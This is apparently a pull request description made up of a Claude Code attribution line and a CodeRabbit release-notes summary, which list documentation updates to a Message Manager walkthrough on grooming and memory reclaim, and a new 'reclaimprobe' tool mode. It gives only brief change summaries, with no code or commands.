🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Documentation**
  * Updated the Message Manager walkthrough with revised grooming measurements, allocation guidance, buffer details, and clarified conclusions.
  * Documented the distinction between debugger-assisted and natural reclaim observations.

* **Tools**
  * Added a `reclaimprobe` mode to compare supported memory-reclaim scenarios.
  * Added validation, CPU-affinity handling, retained-allocation inspection, and clearer usage guidance.
  * Extended networking support and improved reporting for probe results.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->